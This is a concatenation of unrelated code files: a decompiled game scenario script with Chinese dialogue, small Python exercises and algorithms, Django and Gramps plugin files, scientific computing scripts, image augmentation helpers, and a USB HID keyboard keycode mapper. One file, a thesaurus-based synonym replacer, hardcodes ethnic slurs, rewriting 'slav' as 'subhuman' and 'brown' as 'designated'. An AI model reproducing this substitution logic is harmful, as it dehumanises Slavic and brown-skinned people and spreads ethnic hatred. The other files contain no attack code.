Jump("loc_7BE3") label("loc_7868") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 4)), scpexpr(EXPR_END)), "loc_7BE3") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_7A77") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_794F") TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F我说，艾丝蒂尔。\x01", "书和信都还没送到呢，\x01", "赶快去一趟中央工房吧。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, ( "#000F对啊。\x02\x03", "是二楼的资料室\x01", "和地下工场的菲小姐对吧。\x02", ) ) CloseMessageWindow() Jump("loc_7A74") label("loc_794F") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F说起来，\x01", "我们还没有把书还回资料室……\x02\x03", "而且还得把信送给菲小姐。\x01", "　\x02\x03", "在办理搭乘手续之前\x01", "赶快去一趟中央工房吧。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, ( "#000F啊，对了。\x02\x03", "菲小姐在地下工场，\x01", "而资料室在二楼对吧。\x02", ) ) CloseMessageWindow() label("loc_7A74") Jump("loc_7BE3") label("loc_7A77") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_7B24") TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F我们还没有把书还回资料室，\x01", "而且信也没有送到。\x01", "　\x02\x03", "要赶快去一趟\x01", "中央工房的资料室和地下工场。\x02", ) ) CloseMessageWindow() Jump("loc_7BE3") label("loc_7B24") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#014F说起来，\x01", "我们还没有把书还回资料室……\x02\x03", "而且还得把信送给菲小姐。\x01", "　\x02\x03", "在办理搭乘手续之前\x01", "赶快去中央工房把它们送到吧。\x02", ) ) CloseMessageWindow() label("loc_7BE3") OP_90(0x0, 0x0, 0x0, 0xFFFFFA24, 0xBB8, 0x0) Sleep(50) EventEnd(0x4) Return() # Function_53_7383 end def Function_54_7BFF(): pass label("Function_54_7BFF") SetPlaceName(0x85) # 蔡斯飞艇坪 Return() # Function_54_7BFF end def Function_55_7C03(): pass label("Function_55_7C03") SetPlaceName(0x81) # 蔡斯飞艇坪 Return() # Function_55_7C03 end SaveToFile() Try(main)

x, y = map( int, input().split()) print( y//x)

import math def sqrt(n,MAX): float_max=10**16 n_float=float((n*float_max)//MAX)/float_max curr=(int(float_max*math.sqrt(n_float))*MAX)//float_max n_MAX=n*MAX while True: prev=curr curr=(curr+n_MAX//curr)//2 if curr==prev: break return curr def power(n): if n==0: return 1 ans=power(n//2) if n%2==0: return ans*ans return ans*ans*10 def pi(): MAX=power(100000) c=(640320**3)//24 n=1 a_n=MAX a_summation=MAX b_summation=0 while a_n!=0: a_n*=-(6*n-5)*(2*n-1)*(6*n-1) a_n//=n*n*n*c a_summation+=a_n b_summation+=n*a_n n+=1 ans=(426880*sqrt(10005*MAX,MAX)*MAX)//(13591409*a_summation+545140134*b_summation) return ans p=str(pi()) p='3.'+p[1:] t=int(raw_input()) while t: t-=1 n=int(raw_input()) print p[:n+2]

from gramps.version import major_version register(GRAMPLET, id = "PropertyEditor", name = _("PropertyEditor"), description = _("Gramplet to edit attributes of multiple objects"), status = STABLE, version = '1.1.1', gramps_target_version = major_version, fname = "PropertyEditor.py", gramplet = 'PropertyEditor', height = 375, detached_width = 510, detached_height = 480, expand = True, gramplet_title = _("PropertyEditor"), help_url="PropertyEditor Gramplet", include_in_listing = True, #navtypes=["Source"], )

import thesaurus # global lists articles = ["the", "a", "an", "this", "that", "it", "its", "all", "thing"] marker_words = ["before", "after", "because", "since", "in order to", "although", "though", "whenever", "wherever", "whether", "while", "even though", "even if", "at one point"] prepositions = [ "aboard", "about", "above", "across", "after", "against", "along", "amid", "among", "anti", "around", "as", "at", "before", "behind", "below", "beneath", "beside", "besides", "between", "beyond", "but", "by", "concerning", "considering", "despite", "down", "during", "except", "excepting", "excluding", "following", "for", "from", "in", "inside", "into", "like", "minus", "near", "of", "off", "on", "onto", "opposite", "outside", "over", "past", "per", "plus", "regarding", "round", "save", "since", "than", "through", "to", "toward", "towards", "under", "underneath", "unlike", "until", "up", "upon", "versus", "via", "with", "within", "without" ] vowels = ["a", "e", "i", "o", "u"] fanboys = ["for", "and", "nor", "but", "or", "yet", "so"] numbers = ["one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten", "eleven", "dozen"] be_verbs = ["to", "will", "be", "is", "being", "was", "were", "has", "have", "won't", "didn't", "doesn't", "it's"] pronouns = ["I", "you", "he", "she", "it", "I'm", "me", "we", "us", "they", "him", "her", "my"] # enum for word types class WordType: article = 0 noun = 1 proper_noun = 2 verb = 3 adverb = 4 adjective = 5 fanboys = 6 preposition = 7 marker = 8 other = 9 class Word: def __init__(self, word, theo): self.word = word self.word_type = WordType.other self.synonym = word self.theo = theo self.anal_word(self.word) def is_article(self, word): return (word.lower() in articles) def is_preposition(self, word): return (word.lower() in prepositions) def is_fanboys(self, word): return (word.lower() in fanboys) def is_proper_noun(self, word): if len(word) > 0: return (word[0].isupper()) else: return False def get_word_type(self): return self.word_type def get_synonym(self): return self.synonym def get_og_word(self): return self.word def is_verb(self, word): return ("ing" == word[-3:] or "ed" == word[-2:] or "s" == word[-1:]) def process_verb(self, word): temp = "" if "ing" == word[-3:]: temp = "ing" elif "ed" == word[-2:]: if word[-4][0] in vowels: temp = "d" else: temp = "ed" elif "s" == word[-1:]: temp = "s" word = word.replace(temp, "") self.lookup_helper(word) if temp == "d" or temp == "ed": if self.synonym[-1:][0] == "e": temp = "d" else: temp = "ed" self.synonym += temp def lookup_helper(self, word): res = self.theo.lookup_word(word) self.word_type = res.get_word_type() if self.word_type == "adj": self.word_type = WordType.adjective elif self.word_type == "adv": self.word_type = WordType.adverb elif self.word_type == "noun": self.word_type = WordType.noun elif self.word_type == "verb": self.word_type = WordType.verb self.synonym = res.get_synonym() def is_number(self, word): return (word in numbers) def is_pronoun(self, word): return (word in pronouns) def is_possessive(self, word): return (word[-2:] == "'s" or word[-2:] == "s'") def is_marker(self, word): return (word in marker_words) def is_be_verb(self, word): return (word in be_verbs) def process_possessive(self, word): temp = "" if word[-2:] == "'s" or word[-2:] == "s'": temp = word[-2:] word = word.replace(temp, "") self.lookup_helper(word) self.synonym += "'s" def anal_word(self, word): """ analyze the word, determine its type and suggested synonym """ # check for designated if word.lower() == "brown" or word.lower() == "slav": if word.lower() == "brown": self.word_type = WordType.adjective self.synonym = "designated" if word.lower() == "slav": self.word_type = WordType.noun self.synonym = "subhuman" else: # if the word is special, leave the word alone if self.is_article(word): self.word_type = WordType.article self.synonym = word elif self.is_be_verb(word): self.word_type = WordType.verb self.synonym = word elif self.is_pronoun(word): self.word_type = WordType.article self.synonym = word elif self.is_proper_noun(word): self.word_type = WordType.proper_noun self.synonym = word elif self.is_fanboys(word): self.word_type = WordType.fanboys self.synonym = word elif self.is_preposition(word): self.word_type = WordType.preposition self.synonym = word elif self.is_marker(word): self.word_type = WordType.marker self.synonym = word elif self.is_number(word): self.word_type = WordType.adjective self.synonym = word elif self.is_verb(word): self.process_verb(word) elif self.is_possessive(word): self.process_possessive(word) else: # if the word is a noun, or adjective, query the thesaurus service self.lookup_helper(word) def main(): theo = thesaurus.Thesaurus() test = "" words = test.split(" ") new_sentence = "" for word in words: w = Word(word, theo) new_sentence += w.get_synonym() + " " print new_sentence if __name__ == "__main__": main()

# Generated by Django 2.2.11 on 2020-04-13 12:12 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('wishlist', '0009_auto_20200413_0008'), ] operations = [ migrations.RemoveField( model_name='wishlistmodel', name='price', ), migrations.AddField( model_name='wishlistmodel', name='price_1', field=models.DecimalField(decimal_places=2, default=0, max_digits=10, verbose_name='Цена 1,5'), ), migrations.AddField( model_name='wishlistmodel', name='price_2', field=models.DecimalField(decimal_places=2, default=0, max_digits=10, verbose_name='Цена 2'), ), migrations.AddField( model_name='wishlistmodel', name='price_3', field=models.DecimalField(decimal_places=2, default=0, max_digits=10, verbose_name='Цена семья'), ), migrations.AddField( model_name='wishlistmodel', name='price_4', field=models.DecimalField(decimal_places=2, default=0, max_digits=10, verbose_name='Цена Евро'), ), ]

import fenics as fa import math import numpy as np import matplotlib.pyplot as plt import os.path import pickle from sklearn.neural_network import MLPRegressor from sklearn.metrics import mean_squared_error from .. import arguments from ..collector.driver_sobol import solver_fluctuation def RVE(args, parameters_list): W = [] for i, parameters in enumerate(parameters_list): print("\ni is {}".format(i)) args.F_list_fixed = [[parameters[0], parameters[1]], [ parameters[2], parameters[3]]] args.def_grad = np.array(parameters[0:4]) args.void_shape = np.array(parameters[4:6]) w, _ = solver_fluctuation(args) W.append(w) return np.asarray(W) def from_H_to_C(parameters): parameters[0] = parameters[0] + 1 parameters[3] = parameters[3] + 1 parameters_new = np.zeros(4) parameters_new[0] = parameters[0] * \ parameters[0] + parameters[2] * parameters[2] parameters_new[1] = parameters[0] * \ parameters[1] + parameters[2] * parameters[3] parameters_new[2] = parameters[1] * \ parameters[1] + parameters[3] * parameters[3] parameters_new[3] = parameters[4] return parameters_new def NN(parameters_list): regr = pickle.load(open('saved_weights/model.sav', 'rb')) shift = np.load('saved_weights/mean.npy') W = [] for i, parameters in enumerate(parameters_list): parameters_new = from_H_to_C(parameters) parameters_new = parameters_new - shift w = regr.predict(parameters_new.reshape(1, -1)) W.append(w) return np.asarray(W) def run_single(args, pore_shape, H22, H12): if pore_shape == 0: parameters_list_1 = [np.array([0, 0, 0, h22, 0, 0]) for h22 in H22] parameters_list_2 = [np.array([0, h12, 0, 0, 0, 0]) for h12 in H12] else: parameters_list_1 = [ np.array([0, 0, 0, h22, -0.2, 0.2]) for h22 in H22] parameters_list_2 = [ np.array([0, h12, 0, 0, -0.2, 0.2]) for h12 in H12] # W_RVE_H12 = RVE(args, parameters_list_2) # np.save('plots/new_data/numpy/custom_testing/W_RVE_H12_pore' + # str(pore_shape) + '.npy', W_RVE_H12) # W_RVE_H22 = RVE(args, parameters_list_1) # np.save('plots/new_data/numpy/custom_testing/W_RVE_H22_pore' + # str(pore_shape) + '.npy', W_RVE_H22) W_NN_H22 = NN(parameters_list_1) np.save('plots/new_data/numpy/custom_testing/W_NN_H22_pore' + str(pore_shape) + '.npy', W_NN_H22) W_NN_H12 = NN(parameters_list_2) np.save('plots/new_data/numpy/custom_testing/W_NN_H12_pore' + str(pore_shape) + '.npy', W_NN_H12) def run(args): H22 = np.linspace(-0.2, 0.2, 41) np.save('plots/new_data/numpy/custom_testing/H22.npy', H22) H12 = np.linspace(-0.2, 0.2, 41) np.save('plots/new_data/numpy/custom_testing/H12.npy', H12) run_single(args, 0, H22, H12) run_single(args, 2, H22, H12) plot_results() def plot_results(): H22 = np.load('plots/new_data/numpy/custom_testing/H22.npy') H12 = np.load('plots/new_data/numpy/custom_testing/H12.npy') W_NN_H22_pore0 = np.load( 'plots/new_data/numpy/custom_testing/W_NN_H22_pore0.npy') W_NN_H12_pore0 = np.load( 'plots/new_data/numpy/custom_testing/W_NN_H12_pore0.npy') W_RVE_H22_pore0 = np.load( 'plots/new_data/numpy/custom_testing/W_RVE_H22_pore0.npy') W_RVE_H12_pore0 = np.load( 'plots/new_data/numpy/custom_testing/W_RVE_H12_pore0.npy') W_NN_H22_pore2 = np.load( 'plots/new_data/numpy/custom_testing/W_NN_H22_pore2.npy') W_NN_H12_pore2 = np.load( 'plots/new_data/numpy/custom_testing/W_NN_H12_pore2.npy') W_RVE_H22_pore2 = np.load( 'plots/new_data/numpy/custom_testing/W_RVE_H22_pore2.npy') W_RVE_H12_pore2 = np.load( 'plots/new_data/numpy/custom_testing/W_RVE_H12_pore2.npy') case_H22_NN = np.concatenate((W_NN_H22_pore0, W_NN_H22_pore2)) case_H22_RVE = np.concatenate((W_RVE_H22_pore0, W_RVE_H22_pore2)) MSE_test_case_H22 = mean_squared_error(case_H22_RVE, case_H22_NN) print("MSE_test_case_H22", MSE_test_case_H22) case_H12_NN = np.concatenate((W_NN_H12_pore0, W_NN_H12_pore2)) case_H12_RVE = np.concatenate((W_RVE_H12_pore0, W_RVE_H12_pore2)) MSE_test_case_H12 = mean_squared_error(case_H12_RVE, case_H12_NN) print("MSE_test_case_H12", MSE_test_case_H12) exit() plt.figure(0) plt.plot(H22, W_RVE_H22_pore0 - W_RVE_H22_pore0[20], linestyle='-', color='blue') plt.plot(H22, W_NN_H22_pore0 - W_NN_H22_pore0[20], linestyle='--', color='blue') plt.plot(H22, W_RVE_H22_pore2 - W_RVE_H22_pore2[20], linestyle='-', color='red') plt.plot(H22, W_NN_H22_pore2 - W_NN_H22_pore2[20], linestyle='--', color='red') plt.tick_params(labelsize=14) plt.figure(1) plt.plot(H12, W_RVE_H12_pore0 - W_RVE_H12_pore0[20], linestyle='-', color='blue') plt.plot(H12, W_NN_H12_pore0 - W_NN_H12_pore0[20], linestyle='--', color='blue') plt.plot(H12, W_RVE_H12_pore2 - W_RVE_H12_pore2[20], linestyle='-', color='red') plt.plot(H12, W_NN_H12_pore2 - W_NN_H12_pore2[20], linestyle='--', color='red') plt.tick_params(labelsize=14) plt.show() if __name__ == '__main__': args = arguments.args args.relaxation_parameter = 0.1 args.max_newton_iter = 1000 args.n_cells = 2 args.fluctuation = True args.enable_fast_solve = True args.metamaterial_mesh_size = 15 run(args)

""" inversion a list using stack """ from example_stack import ArrayStack def reverse_list(data): # modify the list in place if len(data) <= 1: return S = ArrayStack() for each in data: S.push(each) for i in range(len(data)): data[i] = S.pop() if __name__ == '__main__': data = [1,2,4,6,7,5,10] print(data) reverse_list(data) print(data) data2 = [3] print(data2) reverse_list(data2) print(data2)

#from esp32ap import Esp32Ap #from ads1299 import Ads1299 #import utime #from machine import SPI,Pin #import utime #import struct #from ads1299 import * #from spitest import * from amplifier import * if __name__ == '__main__': main()

import unittest import sys from pathlib import Path from typing import Tuple, Optional, Dict, Callable import os import requests class ValidationTestCase(unittest.TestCase): repo_base: str = None # Base URI or directory name file_suffix: str = None # file suffix (e.g. ".shex") start_at: Optional[str] = "" # Start at or after this skip: Dict[str, str] = dict() # Filename / reason for skip array validation_function: Callable[[str], bool] = None # single_file: bool = False # True means process exactly one file stop_on_error: bool = False # True means stop once you encounter an error number_of_errors: int = 0 # Number of errors detected @classmethod def make_test_function(cls, url): def test(self): if not cls.stop_on_error or not cls.number_of_errors: rval = cls.validation_function(url) if not rval: cls.number_of_errors += 1 self.fail("Validation failure") return test @classmethod def build_test_harness(cls) -> None: started = not bool(cls.start_at) cls.number_of_errors = 0 for fname, fpath in (cls.enumerate_http_files(cls.repo_base) if ':' in cls.repo_base else cls.enumerate_directory(cls.repo_base, cls.file_suffix)): if fname.endswith(cls.file_suffix): rel_fpath = os.path.relpath(fpath, cls.repo_base) if started or rel_fpath.startswith(cls.start_at): if rel_fpath not in cls.skip: started = True test_func = cls.make_test_function(fpath) # Create a test name relative to repo_base test_name = '.'.join(['test_' + e for e in rel_fpath.split('/')]).rsplit('.', 1)[0] setattr(cls, test_name, test_func) if cls.single_file: break else: print(f"***** Skipped: {rel_fpath} - {cls.skip[rel_fpath]}") @staticmethod def enumerate_http_files(url) -> Tuple[str, str]: resp = requests.get(url) if resp.ok: for f in resp.json(): yield f['name'], f['download_url'] else: print("Error {}: {}".format(resp.status_code, resp.reason), file=sys.stderr) @staticmethod def enumerate_directory(dir_, sfx: str) -> Tuple[str, str]: for fpath in list(Path(dir_).rglob(f"*{sfx}")): yield os.path.basename(fpath), str(fpath) def blank_test(self): self.assertTrue(True)

# 567. Permutation in String # # Given two strings s1 and s2, write a function to return true if s2 contains the permutation of s1. # In other words, one of the first string's permutations is the substring of the second string. # Example 1: # Input:s1 = "ab" s2 = "eidbaooo" # Output:True # Explanation: s2 contains one permutation of s1 ("ba"). # Example 2: # Input:s1= "ab" s2 = "eidboaoo" # Output: False import collections class Solution(object): def checkInclusion(self, s1, s2): """ :type s1: str :type s2: str :rtype: bool """ begin = end = 0 pStillNeed = collections.Counter(s1) counter = len(pStillNeed) while end < len(s2): c = s2[end] if c in pStillNeed: pStillNeed[c] -= 1 if pStillNeed[c] == 0: counter -= 1 end += 1 while counter == 0: tempc = s2[begin] if tempc in pStillNeed: pStillNeed[tempc] += 1 if pStillNeed[tempc] > 0: counter += 1 if len(s1) == end - begin: return True begin += 1 return False if __name__ == '__main__': sol = Solution() assert sol.checkInclusion('ab', 'eidbaooo') == True assert sol.checkInclusion('ab', 'eidboaoo') == False

from functools import wraps, partial def debug(func): @wraps(func) def wrapper(*args, **kwargs): print(func.__qualname__) return func(*args, **kwargs) return wrapper def debug_v(func): print(func.__name__) return func # basically just patch def debugmethods(cls): for key, val in vars(cls).items(): if callable(val): setattr(cls, key, debug(val)) return cls # basically just patch def debugattr(cls): orig_getattribute__ = cls.__getattribute__ def __getattribute__(self, name): print('Get:', name) return orig_getattribute__(self, name) cls.__getattribute__ = __getattribute__ return cls

from django.contrib import admin from .models import Rock, Material, RockComposition admin.site.register(Rock) admin.site.register(Material) admin.site.register(RockComposition)

import pandas as pd import numpy as np # coding=utf8 if __name__=='__main__': input_file=r'/home/leon/db/BOB投注属性表.txt' with open(input_file,'r',newline='',encoding='utf8') as filereader: for row in filereader: print("{}".format(row.strip()))

import os import cv2 import numpy as np from util import BBox def flip(img, bbox, landmark): """ Flip image horizontally as well as the bbox and landmark. param: -img, the original image -landmark, using absolute coordinates """ # horizontally flip the image img_flipped = cv2.flip(img.copy(), 1) # horizontally flip the bbox and crop the bbox region bbox_flipped = BBox([img.shape[1] - bbox.right, img.shape[1] - bbox.left, bbox.top, bbox.bottom]) img_flipped = img_flipped[int(bbox_flipped.top):int(bbox_flipped.bottom) + 1, int(bbox_flipped.left):int(bbox_flipped.right) + 1] # horizontally flip the landmark landmark_flipped = np.asarray([(img.shape[1]-x, y) for (x, y) in landmark]) # exchange the right eye and left eye, right mouth corner and left mouth corner # however, this may not be needed landmark_flipped[[0, 1]] = landmark_flipped[[1, 0]] landmark_flipped[[3, 4]] = landmark_flipped[[4, 3]] return (img_flipped, bbox_flipped, landmark_flipped) def rotate(img, bbox, landmark, alpha): """ Given an image with bbox and landmark, rotate it with (angle in degrees) alpha and return rotated face with bbox and landmark (absolute coordinates) param: -img, the original image -landmark, using absolute coordinates -alpha, rotation angle in degrees """ # get rotation matrix center = (float(bbox.left + bbox.right) / 2, float(bbox.top + bbox.bottom) / 2) rot_mat = cv2.getRotationMatrix2D(center, alpha, 1) # apply rotation, (img.shape[1], img.shape[0]) means (width, height) img_rotated = cv2.warpAffine(img.copy(), rot_mat, (img.shape[1], img.shape[0])) # calculate new landmark landmark_rotated = np.asarray([(rot_mat[0][0] * x + rot_mat[0][1] * y + rot_mat[0][2], rot_mat[1][0] * x + rot_mat[1][1] * y + rot_mat[1][2]) for (x, y) in landmark]) face_cropped = img_rotated[int(bbox.top):int(bbox.bottom) + 1, int(bbox.left):int(bbox.right) + 1] return (img_rotated, face_cropped, landmark_rotated)

import os def model(num_subjects,dir): mat_txt = ['/NumWaves 1', '/NumPoints %d' % num_subjects, '/PPheights %e' % 1, '', '/Matrix'] for i in range(num_subjects): mat_txt += ['%e' % 1] mat_txt = '\n'.join(mat_txt) con_txt = ['/ContrastName1 group mean', '/NumWaves 1', '/NumContrasts 1', '/PPheights %e' % 1, '/RequiredEffect 100.0', '', '/Matrix', '%e' % 1] con_txt = '\n'.join(con_txt) grp_txt = ['/NumWaves 1', '/NumPoints %d' % num_subjects, '', '/Matrix'] for i in range(num_subjects): grp_txt += ['1'] grp_txt = '\n'.join(grp_txt) txt = {'design.mat': mat_txt, 'design.con': con_txt, 'design.grp': grp_txt} # write design files for i, name in enumerate(['design.mat', 'design.con', 'design.grp']): f = open(os.path.join(dir, name), 'wt') f.write(txt[name]) f.close()

iModNone = 0 iModLCtrl = 1 << 0 iModLShift = 1 << 1 iModLAlt = 1 << 2 iModLWin = 1 << 3 iModRCtrl = 1 << 4 iModRShift = 1 << 5 iModRAlt = 1 << 6 iModRSuper = 1 << 7 bModCtrl = "0x%x" % iModLCtrl bModShift = "0x%x" % iModLShift bModAlt = "0x%x" % iModLAlt bModWin = "0x%x" % iModLWin bNull = "0x00" bReleaseAll = bytes(int(x,0) for x in [bNull, bNull, bNull, bNull, bNull, bNull, bNull, bNull]) # print("0x%x" % (iModLCtrl | iModLAlt)) Printables = {} Printables["de_DE"] = { 'A' : ("0x04", "0x%x" % iModLShift, False), 'a' : ("0x04", "0x%x" % iModNone, False), 'B' : ("0x05", "0x%x" % iModLShift, False), 'b' : ("0x05", "0x%x" % iModNone, False), 'C' : ("0x06", "0x%x" % iModLShift, False), 'c' : ("0x06", "0x%x" % iModNone, False), 'D' : ("0x07", "0x%x" % iModLShift, False), 'd' : ("0x07", "0x%x" % iModNone, False), 'E' : ("0x08", "0x%x" % iModLShift, False), 'e' : ("0x08", "0x%x" % iModNone, False), 'F' : ("0x09", "0x%x" % iModLShift, False), 'f' : ("0x09", "0x%x" % iModNone, False), 'G' : ("0x0a", "0x%x" % iModLShift, False), 'g' : ("0x0a", "0x%x" % iModNone, False), 'H' : ("0x0b", "0x%x" % iModLShift, False), 'h' : ("0x0b", "0x%x" % iModNone, False), 'I' : ("0x0c", "0x%x" % iModLShift, False), 'i' : ("0x0c", "0x%x" % iModNone, False), 'J' : ("0x0d", "0x%x" % iModLShift, False), 'j' : ("0x0d", "0x%x" % iModNone, False), 'K' : ("0x0e", "0x%x" % iModLShift, False), 'k' : ("0x0e", "0x%x" % iModNone, False), 'L' : ("0x0f", "0x%x" % iModLShift, False), 'l' : ("0x0f", "0x%x" % iModNone, False), 'M' : ("0x10", "0x%x" % iModLShift, False), 'm' : ("0x10", "0x%x" % iModNone, False), 'N' : ("0x11", "0x%x" % iModLShift, False), 'n' : ("0x11", "0x%x" % iModNone, False), 'O' : ("0x12", "0x%x" % iModLShift, False), 'o' : ("0x12", "0x%x" % iModNone, False), 'P' : ("0x13", "0x%x" % iModLShift, False), 'p' : ("0x13", "0x%x" % iModNone, False), 'Q' : ("0x14", "0x%x" % iModLShift, False), 'q' : ("0x14", "0x%x" % iModNone, False), 'R' : ("0x15", "0x%x" % iModLShift, False), 'r' : ("0x15", "0x%x" % iModNone, False), 'S' : ("0x16", "0x%x" % iModLShift, False), 's' : ("0x16", "0x%x" % iModNone, False), 'T' : ("0x17", "0x%x" % iModLShift, False), 't' : ("0x17", "0x%x" % iModNone, False), 'U' : ("0x18", "0x%x" % iModLShift, False), 'u' : ("0x18", "0x%x" % iModNone, False), 'V' : ("0x19", "0x%x" % iModLShift, False), 'v' : ("0x19", "0x%x" % iModNone, False), 'W' : ("0x1a", "0x%x" % iModLShift, False), 'w' : ("0x1a", "0x%x" % iModNone, False), 'X' : ("0x1b", "0x%x" % iModLShift, False), 'x' : ("0x1b", "0x%x" % iModNone, False), 'Y' : ("0x1c", "0x%x" % iModLShift, False), 'y' : ("0x1c", "0x%x" % iModNone, False), 'Z' : ("0x1d", "0x%x" % iModLShift, False), 'z' : ("0x1d", "0x%x" % iModNone, False), '0' : ("0x27", "0x%x" % iModNone, False), '1' : ("0x1e", "0x%x" % iModNone, False), '2' : ("0x1f", "0x%x" % iModNone, False), '3' : ("0x20", "0x%x" % iModNone, False), '4' : ("0x21", "0x%x" % iModNone, False), '5' : ("0x22", "0x%x" % iModNone, False), '6' : ("0x23", "0x%x" % iModNone, False), '7' : ("0x24", "0x%x" % iModNone, False), '8' : ("0x25", "0x%x" % iModNone, False), '9' : ("0x26", "0x%x" % iModNone, False), ' ' : ("0x2c", "0x%x" % iModNone, False), '!' : ("0x1e", "0x%x" % iModLShift, False), '\"' : ("0x1f", "0x%x" % iModLShift, False), '#' : ("0x31", "0x%x" % iModNone, False), '$' : ("0x21", "0x%x" % iModLShift, False), '%' : ("0x22", "0x%x" % iModLShift, False), '&' : ("0x23", "0x%x" % iModLShift, False), '\'' : ("0x31", "0x%x" % iModLShift, False), '(' : ("0x25", "0x%x" % iModLShift, False), ')' : ("0x26", "0x%x" % iModLShift, False), '*' : ("0x30", "0x%x" % iModLShift, False), '+' : ("0x30", "0x%x" % iModNone, False), '´' : ("0x2e", "0x%x" % iModNone, True), '-' : ("0x38", "0x%x" % iModNone, False), '.' : ("0x37", "0x%x" % iModNone, False), ',' : ("0x36", "0x%x" % iModNone, False), '/' : ("0x24", "0x%x" % iModLShift, False), ':' : ("0x37", "0x%x" % iModLShift, False), ';' : ("0x36", "0x%x" % iModLShift, False), '<' : ("0x64", "0x%x" % iModNone, False), '=' : ("0x27", "0x%x" % iModLShift, False), '>' : ("0x64", "0x%x" % iModLShift, False), '?' : ("0x2d", "0x%x" % iModLShift, False), '@' : ("0x14", "0x%x" % iModRSuper, False), '[' : ("0x25", "0x%x" % iModRSuper, False), '\\' : ("0x2d", "0x%x" % iModRSuper, False), ']' : ("0x26", "0x%x" % iModRSuper, False), '^' : ("0x35", "0x%x" % iModNone, True), '_' : ("0x38", "0x%x" % iModLShift, False), '`' : ("0x2e", "0x%x" % iModLShift, True), '{' : ("0x2f", "0x%x" % iModRSuper, False), '|' : ("0x64", "0x%x" % iModRSuper, False), '}' : ("0x27", "0x%x" % iModRSuper, False), '~' : ("0x30", "0x%x" % iModRSuper, False), '\t' : ("0x2b", "0x%x" % iModNone, False), '\n' : ("0x28", "0x%x" % iModNone, False), 'µ' : ("0x10", "0x%x" % iModRSuper, False), '°' : ("0x35", "0x%x" % iModLShift, False), '§' : ("0x20", "0x%x" % iModLShift, False), 'ä' : ("0x34", "0x%x" % iModNone, False), 'Ä' : ("0x34", "0x%x" % iModLShift, False), 'ö' : ("0x33", "0x%x" % iModNone, False), 'Ö' : ("0x33", "0x%x" % iModLShift, False), 'ü' : ("0x2f", "0x%x" % iModNone, False), 'Ü' : ("0x2f", "0x%x" % iModLShift, False), 'ß' : ("0x2d", "0x%x" % iModNone, False), '€' : ("0x08", "0x%x" % iModRSuper, False), } SpecialKeys = { 'ESC' : "0x29", 'BACKSPACE' : "0x2a", 'CAPSLOCK' : "0x39", 'F1' : "0x3a", 'F2' : "0x3b", 'F3' : "0x3c", 'F4' : "0x3d", 'F5' : "0x3e", 'F6' : "0x3f", 'F7' : "0x40", 'F8' : "0x41", 'F9' : "0x42", 'F10' : "0x43", 'F11' : "0x44", 'F12' : "0x45", 'PRINTSCREEN' : "0x46", 'SCROLLLOCK' : "0x47", 'PAUSE' : "0x48", 'INSERT' : "0x49", 'HOME' : "0x4a", 'PAGEUP' : "0x4b", 'DELETE' : "0x4c", 'END' : "0x4d", 'PAGEDOWN' : "0x4e", 'RIGHTARROW' : "0x4f", 'LEFTARROW' : "0x50", 'DOWNARROW' : "0x51", 'UPARROW' : "0x52", } KeypadKeys = { 'NUMLOCK' : "0x53", '/' : "0x54", '*' : "0x55", '-' : "0x56", '+' : "0x57", 'ENTER' : "0x58", '1' : "0x59", '2' : "0x5a", '3' : "0x5b", '4' : "0x5c", '5' : "0x5d", '6' : "0x5e", '7' : "0x5f", '8' : "0x60", '9' : "0x61", '0' : "0x62", '.' : "0x63", '=' : "0x67", } # print(Printables["de_DE"]) class KeycodeSender: def __init__(self, locale = "de_DE", device = r"/dev/hidg0"): self.PrintableKeys = Printables[locale] self.SpecialKeys = SpecialKeys self.KeypadKeys = KeypadKeys self.Device = device def sendPrintable(self, key, ModShift = False, ModCtrl = False, ModAlt = False, ModSuper = False, ModWin = False): KeyCode, ModCode, Dead = self.PrintableKeys[key] ModCode = "0x%x" % (int(ModCode,0) | iModLShift if ModShift else 0 | iModLCtrl if ModCtrl else 0 | iModLAlt if ModAlt else 0 | iModRSuper if ModSuper else 0 | iModLWin if ModWin else 0) Sequence = bytes(int(x,0) for x in [ModCode, bNull, KeyCode, bNull, bNull, bNull, bNull, bNull]) with open(self.Device, 'wb') as fp: fp.write(Sequence) fp.write(bReleaseAll) if Dead: fp.write(Sequence) fp.write(bReleaseAll) def sendKeypadKey(self, key, ModShift = False, ModCtrl = False, ModAlt = False, ModSuper = False, ModWin = False): ModCode = "0x%x" % (iModLShift if ModShift else 0 | iModLCtrl if ModCtrl else 0 | iModLAlt if ModAlt else 0 | iModRSuper if ModSuper else 0 | iModLWin if ModWin else 0) Sequence = bytes(int(x,0) for x in [ModCode, bNull, self.KeypadKeys[key], bNull, bNull, bNull, bNull, bNull]) with open(self.Device, 'wb') as fp: fp.write(Sequence) fp.write(bReleaseAll) def sendSpecialKey(self, key, ModShift = False, ModCtrl = False, ModAlt = False, ModSuper = False, ModWin = False): KeyCode = self.SpecialKeys[key] ModCode = "0x%x" % (iModLShift if ModShift else 0 | iModLCtrl if ModCtrl else 0 | iModLAlt if ModAlt else 0 | iModRSuper if ModSuper else 0 | iModLWin if ModWin else 0) Sequence = bytes(int(x,0) for x in [ModCode, bNull, KeyCode, bNull, bNull, bNull, bNull, bNull]) with open(self.Device, 'wb') as fp: fp.write(Sequence) fp.write(bReleaseAll) # de_Keyboard = KeycodeSender() # de_Keyboard.sendPrintable('-', ModCtrl = True) # de_Keyboard.sendKeypadKey('0') # de_Keyboard.sendSpecialKey('F1', ModShift = False) # print(de_Keyboard)

